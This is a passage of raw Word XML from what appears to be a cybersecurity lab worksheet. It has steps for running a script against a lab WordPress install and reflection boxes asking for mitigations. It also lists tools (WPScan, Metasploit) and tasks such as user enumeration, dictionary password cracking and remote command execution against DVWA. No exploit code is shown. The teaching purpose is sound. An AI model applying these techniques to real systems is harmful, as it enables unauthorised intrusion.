        <w:ind w:right="1436"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>As a user, in Win Server 2012, copy the file and open with the browser. (Make sure you use the same browser which you used to op</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>en the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>wordpress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1508AA48" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="59"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The script should open up along with a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pop-up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0879493A" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="101"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Click on the Submit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFAEAF9" w14:textId="659125A1" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="103" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="1435"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487605760" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3C593E5C" wp14:editId="4D0C226A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1124585</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>507365</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5539740" cy="3680460"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="2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9740" cy="3680460"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="DADAD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4E71C2D" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                            <w:pPr>
                              <w:ind w:left="28" w:right="25"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Record </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-3"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve">your </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve">reflection here. </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-4"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve">As </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve">a cybersecurity analyst, what are </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-3"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve">your </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>recommendations?</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Analyse</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>and</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-14"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>document</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-14"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-3"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>your</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-13"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>suggestions</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-13"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>to</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-16"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>mitigate</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>this vulnerabilities.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C593E5C" id="Text Box 9" o:spid="_x0000_s1045" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:88.55pt;margin-top:39.95pt;width:436.2pt;height:289.8pt;z-index:-1571072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5TYBBAIAAOkDAAAOAAAAZHJzL2Uyb0RvYy54bWysU9tu2zAMfR+wfxD0vthJk6w14hRZgg4D&#10;ugvQ7gNkWbaF2aJGKbGzrx8lx1nRvQ2DAYHi5YjnkN7cD13LTgqdBpPz+SzlTBkJpTZ1zr8/P7y7&#10;5cx5YUrRglE5PyvH77dv32x6m6kFNNCWChmBGJf1NueN9zZLEicb1Qk3A6sMBSvATni6Yp2UKHpC&#10;79pkkabrpAcsLYJUzpH3MAb5NuJXlZL+a1U55Vmbc+rNxxPjWYQz2W5EVqOwjZaXNsQ/dNEJbejR&#10;K9RBeMGOqP+C6rREcFD5mYQugarSUkUOxGaevmLz1AirIhcSx9mrTO7/wcovp2/IdJnzxZIzIzqa&#10;0bMaPPsAA7sL8vTWZZT1ZCnPD+SmMUeqzj6C/OGYgX0jTK12iNA3SpTU3jxUJi9KRxwXQIr+M5T0&#10;jDh6iEBDhV3QjtRghE5jOl9HE1qR5Fytbu7eLykkKXazvk2X6zi8RGRTuUXnPyroWDByjjT7CC9O&#10;j86HdkQ2pYTXHLS6fNBtGy9YF/sW2UnQnhx24YsMXqW1JiQbCGUjYvBEnoHaSNIPxRAVna8m/Qoo&#10;z8QcYdw/+l/IaAB/cdbT7uXc/TwKVJy1nwypFxZ1MnAyiskQRlJpzj1no7n340IfLeq6IeRxPgZ2&#10;pHClI/cwirGLS7+0T1GSy+6HhX15j1l//tDtbwAAAP//AwBQSwMEFAAGAAgAAAAhAPOcxWvgAAAA&#10;CwEAAA8AAABkcnMvZG93bnJldi54bWxMj01Lw0AQhu+C/2EZwYvYTcQ2TcymiOJNsFYFvW2z0yQ0&#10;Oxt3t038905PepuXeXg/ytVke3FEHzpHCtJZAgKpdqajRsH729P1EkSImozuHaGCHwywqs7PSl0Y&#10;N9IrHjexEWxCodAK2hiHQspQt2h1mLkBiX87562OLH0jjdcjm9te3iTJQlrdESe0esCHFuv95mA5&#10;92tMv6/2Lx/L4XFEj89r+bkblbq8mO7vQESc4h8Mp/pcHSrutHUHMkH0rLMsZVRBlucgTkBym89B&#10;bBUs5nzIqpT/N1S/AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsA&#10;AAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMTlNgEEAgAA6QMAAA4A&#10;AAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAPOcxWvgAAAACwEA&#10;AA8AAAAAAAAAAAAAAAAAXgQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAABrBQAAAAA=&#10;" fillcolor="#dadada" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="44E71C2D" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                      <w:pPr>
                        <w:ind w:left="28" w:right="25"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Record </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-3"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve">your </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve">reflection here. </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-4"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve">As </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve">a cybersecurity analyst, what are </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-3"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve">your </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>recommendations?</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Analyse</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>and</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-14"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>document</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-14"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-3"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>your</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-13"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>suggestions</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-13"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>to</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-16"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>mitigate</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>this vulnerabilities.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Now, go back to your wordpress and observe the changes. (Hint: Whitelisted IPs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48150F13" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00D02F84">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AF023B7" w14:textId="4A967236" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:spacing w:before="82" w:line="328" w:lineRule="auto"/>
        <w:ind w:left="1200" w:right="3277" w:firstLine="1852"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="15748096" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="46BA1182" wp14:editId="7580003F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9727565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="23" name="Lin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9D24CD0" id="Line 8" o:spid="_x0000_s1026" style="position:absolute;z-index:157480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ct9ywEAAIMDAAAOAAAAZHJzL2Uyb0RvYy54bWysU8GO2jAQvVfqP1i+l0AqEI0Ie4BuL7RF&#10;2u0HDLaTWHU8lscQ+PvaDrDb9rbaHCyPZ+bNmzeT1cO5N+ykPGm0NZ9NppwpK1Bq29b81/PjpyVn&#10;FMBKMGhVzS+K+MP644fV4CpVYodGKs8iiKVqcDXvQnBVUZDoVA80QadsdDboewjR9G0hPQwRvTdF&#10;OZ0uigG9dB6FIoqv29HJ1xm/aZQIP5uGVGCm5pFbyKfP5yGdxXoFVevBdVpcacAbWPSgbSx6h9pC&#10;AHb0+j+oXguPhE2YCOwLbBotVO4hdjOb/tPNUwdO5V6iOOTuMtH7wYofp71nWta8/MyZhT7OaKet&#10;YsskzeCoihEbu/epOXG2T26H4jcxi5sObKsyxeeLi2mzlFH8lZIMcrHAYfiOMsbAMWDW6dz4PkFG&#10;Bdg5j+NyH4c6Bybi42K5WJTzOWfi5iuguiU6T+Gbwp6lS81N5JyB4bSjkIhAdQtJdSw+amPytI1l&#10;Q82/zMt5TiA0WiZnCiPfHjbGsxOkfclf7ip6Xocl5C1QN8Zl17hJHo9W5iqdAvn1eg+gzXiPrIy9&#10;qpSEGSU+oLzs/U29OOlM/7qVaZVe2zn75d9Z/wEAAP//AwBQSwMEFAAGAAgAAAAhAK8JI6XfAAAA&#10;DgEAAA8AAABkcnMvZG93bnJldi54bWxMj0FPwzAMhe9I/IfISFymLekqJlqaTgjojQsDtGvWmLai&#10;cbom2wq/Hu+A4OZnPz1/r1hPrhdHHEPnSUOyUCCQam87ajS8vVbzWxAhGrKm94QavjDAury8KExu&#10;/Yle8LiJjeAQCrnR0MY45FKGukVnwsIPSHz78KMzkeXYSDuaE4e7Xi6VWklnOuIPrRnwocX6c3Nw&#10;GkL1jvvqe1bP1DZtPC73j89PRuvrq+n+DkTEKf6Z4YzP6FAy084fyAbRs1ZZylYebtIkA3G2JJla&#10;gdj97mRZyP81yh8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAA&#10;AAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA7j3LfcsBAACDAwAADgAA&#10;AAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEArwkjpd8AAAAOAQAA&#10;DwAAAAAAAAAAAAAAAAAlBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAADEFAAAAAA==&#10;">
                <w10:wrap anchorx="page" anchory="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Other Tools and methods to try and record: </w:t>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>WPScan (A black-box WordPress vulnerability scanner) Acunetix Web Vulnerability Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19971F31" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="275" w:lineRule="exact"/>
        <w:ind w:left="1200"/>
      </w:pPr>
      <w:r>
        <w:t>Meta</w:t>
      </w:r>
      <w:r>
        <w:t>sploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55944A14" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34EAD2B5" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="178"/>
        <w:ind w:left="1200"/>
      </w:pPr>
      <w:r>
        <w:t>Tasks to try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA243BE" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="101"/>
        <w:ind w:left="1200"/>
      </w:pPr>
      <w:r>
        <w:t>Enumerate users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0DAFA1" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="104" w:line="328" w:lineRule="auto"/>
        <w:ind w:left="1200" w:right="3860"/>
      </w:pPr>
      <w:r>
        <w:t>Crack Passwords by doing dictionary attack (not limited to) File upload vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B17AB00" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="273" w:lineRule="exact"/>
        <w:ind w:left="1200"/>
      </w:pPr>
      <w:r>
        <w:t>Remote command execution vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6607EE0C" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59443466" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="181"/>
        <w:ind w:left="1200"/>
      </w:pPr>
      <w:r>
        <w:t>Try these with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289B186E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="1200"/>
      </w:pPr>
      <w:r>
        <w:t>Damn Vulnerable Web App – (A vulnerable web application in our lab setup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6104F299" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DBD218" w14:textId="08A8C3D2" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487606784" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6B3E8A01" wp14:editId="4105700F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1124585</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>158750</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5539740" cy="3680460"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="22"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9740" cy="3680460"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="DADAD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7C08D26" w14:textId="5C5F8BCC" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                            <w:pPr>
                              <w:ind w:left="28" w:right="24"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Record</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-3"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>your</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-13"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>reflection</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-14"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>here.</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-10"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-4"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>As</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-13"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>a</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>cybersecurity</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-17"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>analyst,</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-13"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>other</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-13"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
